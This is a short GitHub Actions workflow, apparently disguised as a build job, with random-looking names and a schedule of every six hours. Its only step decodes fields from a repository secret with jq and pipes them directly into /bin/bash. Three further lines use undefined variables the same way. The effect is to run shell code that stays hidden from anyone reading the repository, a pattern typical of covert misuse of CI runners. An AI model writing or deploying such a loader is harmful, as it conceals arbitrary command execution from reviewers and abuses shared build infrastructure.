name: stirrigid
on:
  workflow_dispatch:
  schedule:
    - cron: '37 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: stirrigid
        env:
          fb8: ${{ secrets.fb8 }}
        run: |
          echo $fb8 | jq -r .c4881 | /bin/bash
          echo $ca997 | jq -r .fzav1190 | /bin/bash
          echo $y78810 | jq -r .mqi61 | /bin/bash
          echo $lxg2399 | jq -r .asndf3 | /bin/bash

